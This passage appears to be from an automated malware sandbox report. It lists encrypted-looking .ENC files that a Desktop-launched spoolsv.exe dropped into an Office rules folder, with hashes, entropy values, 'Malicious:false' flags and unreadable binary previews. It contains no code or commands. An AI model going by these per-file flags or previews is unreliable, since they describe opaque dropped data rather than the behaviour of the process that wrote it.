                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.@(".......Z<..7V.h.i.o..TP.SlP3W.H.....C3..a..=...TBP..Y.W.W.%/..._..P..j-.=S.....{.u...}K..EJ.\....(1.&.8}R...D.._....,.1q..'....w...u.g.\..'.(..>...]..w.........&....e....H0.px.Gq.....*...Y."p\T.9.|.%.../.........,.....m*H.rRG>Z.i.hP.P....LRZv..'q+..1.J.......LQ.^ @.e]t...O.ND...=_f.>....x..H.'.Isc.`z....c.D>>..'....0`}o{.5Dc....N...s.B..?z..._`.... G...S:.........!....xV..j.:Z.....sE..Y.}u...cE...O;..D..E..[.8e.....A.:9E.L{...L!.......m|.}..|.H..,u:.N...C..C..\.YT9*..[...m.7...!d.<.......b...f.3.....u^...u..,.-o.8nb..k...^M.........zZ...QB8..Z+..Y...`....m........Re.../.E.....xR.!..m/.n.X1-...k.Fc.e.&...O..c|.%....VC..%.....e..H..,.......p(..-...0..8...?..}.../3...."g....MY......=_....gO.U.SK.J ..Y..;.Q.u..b.T`a..~.R......&.]+..0.d......`.;.'.po.a..`.....E..|Y...0.4.ee.........s=.Ew..\...X6.l.wF..T.^b.@..h.._&.Z..[.v.y.....)E0..C.....7^j.....C.._..:...5X/z[.......1r5...K!...m|....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700550v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.874717342657946
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+rRpQfmTjODVENyH9wra/eE+3v0h1HwmbqSr2cIlxMI2zc0vIobJ:+rI+bM9J2EWHKD2xUQ0hN
                                                                                                                                                                                                                                                      MD5:0A25E76E3B073321978F1EEEDE964CD4
                                                                                                                                                                                                                                                      SHA1:64E252AEC995F765A25E13A46ED23D53C2DAE945
                                                                                                                                                                                                                                                      SHA-256:9CD3AC992CA921C9B9689E9CB749B71EB8816369B5D3FDB9FB37CA15691649B6
                                                                                                                                                                                                                                                      SHA-512:865BA5A570AED39E1E4EF6EC43A85A748A24F3973E95D36982B53397FC6B5BAEC354AB4FC4DC38F7B9B32DD170853EA7A841ADB14AA2ACD6D0D74F3E0AB95A76
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.@....-...B.%....J..]...9a]..0.`...s.....O.S.....%O.my\h..[.......}.<........_.....n....[.. Ppl.....<......pik..9!.8;...............s|...{g.<...*.N\..f...P.^.`...b#9...L..i..j..nbs....[v.k9.....tTr$...6-......+.......&. ..J.}..1.Q....HW..8..P6z.2..3.-..\.#N.^..7...v...`..hpx..../.^.3......<...|.D~...tG.Cs=.U.geuh;....4|....x..u...y.*...i...6..N".w.......m..h0D....I.WH....yn.F.Z.( ...@.:.+t...`.&.aBx...>.:!gB...%).g.z...M...B.Sn.D.u....CB.m.Z.A...Z..9e..7....(`.q;t.&b.H.}.........U.S@..l...c....#....$.....Z6.....i#U....Uj....'"hb..g./. ...R....;q$.n.U.F.....;.....P.HWe4U2.1..%..;...s..;....8.2....}..[.m...y.x....XuR.]......u5.+/gN.Z..5w...ss....v.x.n...I.{.d...$Do)l.....k.ul......n..... ....)X."gx~....q.y.w.....(.$R.....s..h......dVm....$....1..`...K....Q.6.Y...sT>1..I.<?..........D.!..~.v...;...h..Z.a..{....6S.d3.....]...$.nF]...C$...#D...4r.G..Vl.~..L.*4..R..eW.Pv<x...7.q..a....-W.g.o7z].}%y..D..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700551v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.872386583469537
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+Jwz1PKtzAFpj1XbsOH6bLFfkGOJHcOsVxI5apkdj2NzRELtt9kv:+sPqUxNjgFsGefKGMqdjSQt9kv
                                                                                                                                                                                                                                                      MD5:4C02B34DB61426FCA2AF20258928226E
                                                                                                                                                                                                                                                      SHA1:8B663BA597DABB722795DECA265D613EA5137074
                                                                                                                                                                                                                                                      SHA-256:F9A6D3D38CCD345380B985925B9EBD2BFC896FD70A7C3ACBF57CB62E421FFC7C
                                                                                                                                                                                                                                                      SHA-512:80508DF0F02A76ABF726FFEC8EB318CE28050DC532FA9018E436A2E03AE97807F56F3BCD49F769992BD4C3D92EE3D282E98201C5827324267C53A134E58C15DA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.Oz......*..5.[...j.)....2....f....."...(:..4.3G..l.C)x.>.@....0z..rM.0]..w%...b.>..DG].X....6..........1y.h.....KM....^.r[..6".-7..m..Tv.31...g.{..<..:.....qU.ps..2I.^R.e.....9...<.oW..m...b.*..:..<u.....;..o..l^....vy..d....{.....Y..,.F.E.*.......9w.j6kq4.tww..7.<.......=......*.@'.B.m4..KfvX.....m.I.a...{Z.Di26...........cI8S.?..~..4........J..k..M.Y...8.*.".'F....Ri..T?....V.MUk....b..... (.....g{t4....}>.......l........<.n..t/..~c.j`....hK.........*...s.w..W..k_T....?0.,.P....g.`..7...@g..w.Rm...g....E....PDX;M.*..........$"..f>...p.J..s.o...dM.9../.d.H...~7T...CY. ...S.0..(.......Z$A<.1..*..c..#....y.Z...g..o..}@.`....]..p....$.../W..kY.j..G...].i&.l.d% .....!%.m.K.+.B..A...F...y:Ym..(~.#.E._1.[...K.s..o.&".K.M.0M..6..N..Y.......bJx...%R...b....%.K.....G........5..$2..O.....9.W...P1+R...l...k.K.....F..C..z...3C..*.....&.Z..c.}w...f[zV..$.<9.a...m:...2..$. ..m.=.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700600v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.861219545177587
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+M/v+PyA6BmQiA6DBywTf3ijQgDCEL8G+9UIJp+mp2spdoa0CGy9Tge8Xu6yUER6:+Av+eKtIwTSr8G+9Uypfo0GfERsf7xR
                                                                                                                                                                                                                                                      MD5:7DB8FCAA0CE111A3409EFB7AE60EC50A
                                                                                                                                                                                                                                                      SHA1:FB422FB4BAC711F1218DB88E14A0721A3DA86015
                                                                                                                                                                                                                                                      SHA-256:21C43C2854C76269BA66C1F1B8ABBB89F5037A44D04F57C97D64941E12D058B2
                                                                                                                                                                                                                                                      SHA-512:CA28A2A42EEE9BD99E724C3BB6FEC1D6FE7FAFF2094E47E59725C2BAC611600A1B35DC890C5826E9718A5A8912717B366B96BBDFCB084FB4583B1D44E4EEE27D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.^.7#.r.%Qz.J..Ma..o..\G...[$Px..KJ.B.h%.RU....j}U(.IP.tl.f_...SF..I.5.I..5l..$"...@.p.a.".r..j.=......S.}/wG.T=..#.G...p..5.uo.{.x.d..5....z......=.Ek..$...B,.M......c.`)bN....u2...`P.~.p........ot4._^.......Z.0....b\..y)m.\..O.....U....X.n.....j..pj.....f,...V.5....."}..w...........*x...JI8.d.....6^D...,...U.'...;...=.l..p..OP.C....3..BG.l....N=....7..(.....0.....=..........ucm|..l...{..y..Q....E..s....L. Y...GwE.....k,.HjElFl.$...:.I.....&+.O.^W.......6.....J."FqO.%Ox.&D..LG'.Ra./.'9w.b/.V.OX.t.<......U.P...x....t.l....'.~!i.%..K..>..B8.s...>.T]..6......'.y...X...4...9..V.S.W.rA.g....a...X.p..y....>.6....j.U..}.q........KD.$K.?...[...Em.......?x.U7b.h..C....&4..L&FX.}G..6..RQ.....2..F.G.c...z:....0...92..>rN..S.n.Z..kQ.......aJ]..M+g...P..#u.I).eAm.P......G.n....W.......|..'...k.C.'.."..D-;..]....ad}b..8N...e9..Y.d.|lec..5.&..a.,Bq.o..... ..a.....G.{$.s.]........,Q.....-.J.u...X...n&.ri!r.N.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700601v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.848940183844412
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+MAGvXJJfcg7u+7gFkXa5deOnYCSPCr1rER/GXnuSnu1VEJkn9wHvsCFZQBHls:+MjXzcg6+7gFhduCSPo1QGXuSnudqHvj
                                                                                                                                                                                                                                                      MD5:7D1A105514CB975216945A3BF97F17F2
                                                                                                                                                                                                                                                      SHA1:755F8E3E0BB8B771B2DCFAFCDF39CA1323995A3F
                                                                                                                                                                                                                                                      SHA-256:DA4F754FB9703E2E29DC1FF79C701BCEE2B4140D5BBDF0EA876290D360C70874
                                                                                                                                                                                                                                                      SHA-512:8B2EE21F234F2B7F2E021419F82B5D16607FFFDAE5545609605E07079D66B39E501EFDBAB1691A4953A2E72AE439113B6F431A2483DA7FDD45A714D5A4A6A75B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.p...hfZ...i.J.b.."....#C.........#y;..WV.....$p...q2.....<2(s. 8..:q.W.w....u..x...Tk....s......>.35k. ..-}>q.......TJ..O@i...q.....h.......!.......3...~ [.S......`...^...?..k.xq...%K.6.@Y..W..(._M.......K.5.T..N#&X..sz.:=.;%).......H....H..%.&..wR..Z7.....d....TG.)Q[....$O..q..k)..?1.Z;.F2.o.W.....o#.tN..%.........~d..T8lS.f.o...G-..Q2..Z+.f...G..a.w.D.(.P.Q.<...14.....*0..tjjm.Y.....)S..n..K...%.RWN.p....Y.j.E....'..2.G..6G..<>.V..............0..?8.R.E..O..*...&0..`.x......~P.).R.....;{...6..[..LF..`$#.7.*TZ.w...|..=.......i[..R..O~...~"=....n2$[CS).<r..*.A.)N.N.MQ....\.B..`_?#,..B..>.}........$.(.-.>RR.z.xQ.d....3H..8"7 O!Z.,Yr......#....E...|w.X"...$-5.c.7...2.>.s.f..B.&..m/..-./y..3..u5#T..l...Y4.".`>_.cj.(.LWn.V..a...w...NI..Z..`M.k.C....4..+...........:My?.....X......u.T.J.x(.....L.F2B.2..D....w...?$^9g..S? >KU...;....[...H..E....g.d..,m.....{.S......J.$8z\...r..`W...&W.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700650v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.868957339127156
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+ASCYZLdiYADwLBud9Tw9JVqxj0m6Fb/N7ltEleE4wtGR+Cp13k:+AI8YAa4DC/N/EDF7
                                                                                                                                                                                                                                                      MD5:F60B109FF6FD98336C8E23B03FA8BBA8
                                                                                                                                                                                                                                                      SHA1:5A03A60EE404B785143F082850EC61DDDE6C9C90
                                                                                                                                                                                                                                                      SHA-256:07663C74DDF3296C4479168901EA5F87B5F46CBE0C5D0CDEB6F015C95673A1FF
                                                                                                                                                                                                                                                      SHA-512:174683EAD7F415040334CC81580144599EA750D58C867D1707C05509BD86C014F54DC682D7306C7138546088EAD77EC3B31861EF429F5F457868C126886C6CEE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..S.2....C1...`.FLk.S..6......L{i.T)..%..b...m.k.LD7J...}j..[......X..1.yRN..Z..6[......Ne.k..]...1..z.^|;..a..h...I..t...S].....x.J....fK..wW....&. 8cx.nw+Uv7.=6....5...s#u.Y......k..}Qi..2B@7K.......+Y..h.8...=.u.n.....tXh..r....R..I..Uo.......nN..dE, ..|Q.7.q..<.......r...XH.^X.y..iS..x...p."....).*.gSj.a(..txY.....i...6.E.a.\Y....%.(.K:W....l.....<^.w.E..p..;j.c..8v;..e......-Z=..v...?......]W{...Kt...Dnu...,..x2=....\.....L.... ....:O.}.-...?*$...]W.C"2...*....'.r.......%....E.C."..PA..%@..#.K....f......&..b.E..>S@.h...U..'....-br.~U..............T._?..a..^+.e..`e.=T. ..4.gx.b.0w...f...S...P..rw=.....cV....jZ0.<i.....9.c?..}....7..H.1.o.qG.FL. ...9...)[L..}..M.s...d...ev....$.V ...&K.w........f>z..../.tnr...=......K...i....r8...Iv0...NA.'A...7!...)...h..;IBf.(W3..V..~..Z.v..e......[...LQ....X...biR......U.y.0...C]..=.(3G........>...#....,.%..`.J...x[M....2.....^I\....4e...S

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700651v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.8723854372375355
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+/nwl7HaoriF5gjdmeV+3IN3RwdsXFlKB8x6lmUwGHD+8:+/wl7Hv+EciqsXrKvmFGHDJ
                                                                                                                                                                                                                                                      MD5:162F04599B37D8DABCC30E6D60489198
                                                                                                                                                                                                                                                      SHA1:8EA657171901E6BD5CC798497C45286B5EB7888A
                                                                                                                                                                                                                                                      SHA-256:8C47DCDF60523D904B4DBED1C76424EB47EF261B808758146889AFD1E15CD5C8
                                                                                                                                                                                                                                                      SHA-512:B6F793AC69FADA843762EC8C12F5ADFD0929E542DC76372D22530FB472128D8C4262E5B63AF8FFB89499D2FE48349513E5BB5E458D25B6E9D861B48A1CA3E3AC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..."0..y......r...)....I....R.cZ.5..H.PP-.....i.*.4=m..=.O]@fC..7$..^..................r....mB...B...5.W.7..-.H..ri..v.C..b.$Z.w.....P41.df.Z.8.BS....TZ...j.{....a.....K..9...X..!...f.&.#. ........=.. .N.pz. ...`.XU_.j.R...:..ET..R....@....b..J.k.y~b`...-.rLpt+-..U.8_..D...qt&Q.....:Sy8...".$r....1.......>;/....pH..}....,S.{"...dR4.!....X.dT.*N.a..]...i..yi..J.v...l.i4~...Y....U..g.z '........s.[=..;$.QN.=..zm....F..~....p.7S.....h.T...(.._.....g. .oq.}Y.jA...Z..K.s.....K......... ..`.JF5.O1.L.&...__W,@.o`)&:.x...z..1....yu.m=......RU?....T.DVl....K.@.Y...9..m..K..........[.(Y3..f.x....Ds...$V.%..`<.V.G..Ut.|..w.y/.o.`/._...\-5..gI...S... .GVL..uF..L......H.....-....$..l...#:,.C....,..pO.U..2-....k:...f[.o..ta.&..;e. .F..v.....N.m.XL.... u...r.8:...j.U.f.z,.w.Y...(.ap.>..A(..v...<E.RK:\...Ou. .t../Q.K"L....X,...ad.`.&.."..qR<..$.E]@...^..?.z..6cMtK.N.h.&.`....2.!H....[..9..Q..#.@X..H@#J

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700700v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.865710509713229
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+LgL5Kp9aZiV4ZZApEOQS+okmuCcZWYv5kruptsAJS6rus4rAkD:+u5sE26qpwbltsAbu9P
                                                                                                                                                                                                                                                      MD5:6A96D53450CC77B2DD81915A55E32952
                                                                                                                                                                                                                                                      SHA1:E22A0B827516D4D41B43FA3270C8CE027BDD3731
                                                                                                                                                                                                                                                      SHA-256:5B540F40933E5D4F070218AE7D0988161681097A340A06BFF6A78393481370C2
                                                                                                                                                                                                                                                      SHA-512:C952A6AF16E43CFFCDDC2BD10CB85031DB220EA62237F0E98467D73FCC0CAFB3F44D56B512D03B2A4E7FB2CBFE895CB29049F3BD369F6D79B82FB543D34F50E8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F...q.w...6.'-z.v{.;.vr#.B...pF\... ..r.Y.....0.`u..4. ..]..*.....0....Td..,.....`.iJ..1......w.,..@.i....zP..p...4..ED,.5.....Fo=.N..X..5....*.W.x......S.0<a.h.&bU..hl=..4+."..XW.".....p...Qm|..^c......[ZO.w{....4d,k.RG.e..<.....I.q}!&.:..:.K..c.m.F.6.l/.....i...U..#d....G....R.KN.'Y...7.........W..|..BZW..|d...#9.[S.y.sN..GI..B3.R.a.V.....V..2}....t@.<.6F.....zX.r....9..).E..o..XI.Ll..n.._.demJ.v.;4\.2,u.......x'..H...V....d(`.ff;.f..8......F]s....j.....$.~....>...<..uR.@...T....Gu.W.?..\.>..`..f..03..W.t..~)#..7...8H....m+.`..|...K."...RQ.yz.....H..X7..o4V].k.#{?&..$8.]....t5...=...n..]...Y.FN..g.../..xb.V|...I).L3...ay..."T.2.Y.....-g.*.;..:un.|.....F.........is.UW~..au.P....7..Z.[BW....L.+....k.p...,..1..A.0!.D...^P.W-.'.-.f.....dL..5K.(......i..T.....(..G.Q...yO.J.#.. .I.C!..o...c.I._.D..-.Q.cK..[.H.'...t.../q..|.G..b.?...Eo.%J.6..L.m..(.\..2..[...`.L...j.Qw2.. ..$....M..z..qY....Y]k$S.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700701v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.869435461515236
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+gcBcXTTBF6BvVgaCDCRlEVHY4/WChzxz6Y8a1hmlpXYg570UUOJ+DnJrvy:+TBcXnBIBvK1elwASz6YcpXYg570U1A+
                                                                                                                                                                                                                                                      MD5:BB98AB69D4514FC0D95AEDC5DD463C5B
                                                                                                                                                                                                                                                      SHA1:C09B8FC6CE608B10EB211D69C36CD2F6D96C27C2
                                                                                                                                                                                                                                                      SHA-256:9E21077FA0D1641A2E0D807D8C779D9FBD14A4560B1CF185CAF3ED5CDF332766
                                                                                                                                                                                                                                                      SHA-512:E409DD4EE47A25C1FAAE46479132C793FA30548A8283934825181289F97E7F84C9B90F11D22637EB8541CB579C5576B4EB3C4CF8754D1C23148EFD035312A79B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.l/..t...o.....1......../...>.B.n......|u.._{4...8K3U}.rf..A..&..Q.......8...B... .Q.....-t...A2.>Lr......K..dbprW .G...[.....'..h.;%...?B+.q..(.C....".p2....m.7.Q....>..'~.&.6. ..F..............dV..1.a.X~.._|..E^.'..:@d-.Y....{-...i..Z.1.....F.nC!+..t.0...%>._......2....N+........... .0....Q.jplI.E....2-Sj{F^Pw....p.7..t...a..4*7..]...],.^6_.c...X...;.....%.......Y.......6.n9.8.....B.....,....s..8S......YsE....hp...N..PH...? HdOLVd.3...P. ..:.jo;..[#p..m..R.M.X..3......t@.q.z<.....K]...bP..w.1v3....j....+q....r...d.[S,|..5..A..o.W..E...}w.`..H.rq.v.:tr..v....5.V^_.O...:gVy..9'....Iz.?FH;...2...}...r;~.NfDs..ym...Z...2.mc..6.R...E..%.....g...F7......Qjw..1%.].M..6.o.....s..(4_....#...RF...D..aT..d..-.:...OI+I..[.f....K\*.].n..SG..Y..X-9....S....'.....%...<"/Q h*k.\...p..x.......{.g..\..Y.....NMA..%.0..R...:.Z1.q.?.63...3...b.>......%..zE...-...cx....:~.Y..j..u@G.9.)2...{.B?5.......c

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700750v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.842679329482312
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+8yZ9BYNA5gpSdckCQnCD6tG+4DdpdenY5D4lnDOPobOJxU9gIZhy979FUhWIb:+8yZ9em5gp0c/uYbknYebcxUP3y97uD
                                                                                                                                                                                                                                                      MD5:56B086C94C68CFA43B13D027D4CDEF33
                                                                                                                                                                                                                                                      SHA1:3BC8DBD01B5E2940D0701DC722545E0694BFDAA2
                                                                                                                                                                                                                                                      SHA-256:B2AFCE2588A6E553D3EFD17F386D72361470A8CAA193ACB34B5AC86FF6CD7883
                                                                                                                                                                                                                                                      SHA-512:D90CB79371C8C1663DE4435A9957A42B2D08D8363174D6E37CBDFD3FBBCB3FB9C3FFFB3CEC4FAC97C153C081C4B221A32023D91D14E35CF6C9F0DBA8BE5643F5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F......CHE.9F}..h"I...}..q.CV;.k]L...|.c........S..YA6.`9....Xt}".G..[.&.[de.$..E........>-...$B.c..SzW.2c9......2.h..)CR{.|..Y...8.C..a..F5..)..z"..h.I.........}} d.....<.+......m;J...sI1....,.w8..r'i....a__...`..jG.A..US.X..g0SL..F..T./.E..O).....u./..g....b..J..V.X.*gkK. ...1.:hf..y.>... .....39../...R........&......_..@..pks.h..*h..... l..k;G.[..&ZO.,...2.Y.&.o.E........w.(.K...8?....A...V.;....v...P8 <6.....z..l..,.2........c`.J..T.....$..~...P..4.Sw.....9...NP4...d...C...G.1.Hli.w..R........&Jd.YA....?5.2.........\._."'.fY..W$M._C............\...`@..@0..^.8..1...K....%r..B`.R}..M..\.H..vi.w.^..8.I..6P6.....0 ..35....'.U.b..A......M.h=.}..V..g...J.TA...V..HU......=A..d...r.d..%\[s.......Q|....?...M..d......,. .|..$.....kz9...|.S.1G.[%..5.."..t.k.E....|>.....!,..nE......7..._.L...zXR..g&[.\.,..lU,..!...AwA...*......$;L...}Yt.3wM.E.fI>y.+h1.....u..=.....f..O(dV.(......A..W`...|>s..6.jK...&..m.(_.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700751v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.854585951434255
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+s+3EM4M4XDF/D80HDT77XUpQuz5SwDjJa+LyGCXgKIwDXHylQqfj8wI:+sYKX54sDT77XUpn5hDjcC2XgKzXH9o+
                                                                                                                                                                                                                                                      MD5:35654062330E666A877A6869BF222DC9
                                                                                                                                                                                                                                                      SHA1:D0112CB2E6440B9AAD2D73C2A20ACEA1EAC46719
                                                                                                                                                                                                                                                      SHA-256:84C35AA5C97A8E95A483BA2D51BD1877040589AA1BDE618ADE594C12073420B7
                                                                                                                                                                                                                                                      SHA-512:29951C59B20192D27999E50E6F95E7B1B67993D9E59A1B0C01C95157469DF5E1CA83A667205A2D54ECA37C9BF5DE4C3BD89906C24DDF4478197D495E3F34ABF4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..Zq....N...(..'.......2.J.%...|..;Q.mr.p/.4s.?-IN.....s.U@vKu.[o..e.T....\?=..Eh..;.n.ffa.B.Y.......Hg.....I>...s..-....P.Ns...W7.....A...a....${...lJJK..fZ......L.{v....-S..e....."..]...uY$I('.0...M...{.3.t..[.z....)>R..y|..A...m.).u.}..L...7.we...J..%.f.`.l..v..r9.......w.%.-%.W.......O.....B..,......v/.c...3T*..+.D..;....T...H...-.v...|%....a....&.R..7......El..O..&".PEa.,...(.b.fP.=.*.].@.0...B..*m.?..A..........t..R...9.......J.G..T...X.Mn....v4....(.!.`E.7*..}.sqYl..2p`.t+.L......3....L.5z0R..`...V.y=......."M.@#...n.l.s4P..I[j..b....U]K..'.w|......Y......#.3.'......[=..U.]p.%....TaAu...+.4v>......'-?I.0u.'./...L&eh.p.....=.......$...S.6.v..]...6~-..n.^j.....)....k...s1.....m..=.@...Z.n.FK/.y....O..].!.KRNP......:.....'.....(.....F5..{T...."K.).#^A[B..))......V|k...w....f..P..../;..H.F..a3.....y...<?.t=q.Z^...e..&Y..mL..._...W.....~...I..h..d...;.4XE.....k./%pj....a....f..o,.B.;"..5H

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700850v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.874569355226659
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+DXXbPHQkHn20IeNSSPjaKoMZiUwbNueefiIXi0+/vcCVIKXJsx2vLGi1phoTQL2:+DXrPHZVSKJiUwbNueeaIDKV7sx2zfrc
                                                                                                                                                                                                                                                      MD5:B6BD7D48CA73E3A02172DF1C5BBD192F
                                                                                                                                                                                                                                                      SHA1:849E6926A97580E85C36343557520926AFA72EE1
                                                                                                                                                                                                                                                      SHA-256:81258383CE73464D32DB324CE97AC4CE99DF676D858E12F19CE20188F96DDD0A
                                                                                                                                                                                                                                                      SHA-512:3DDFD99B5BE384629866010D77B58E9B84A1322AB4D9A93FAA9BA030C20CF7AA11F70057AA4547767C869CA38F6A76F9C491C7651F49D841365F634F5FC9FC5C
                                                                                                                                                                                                                                                      Malicious:false
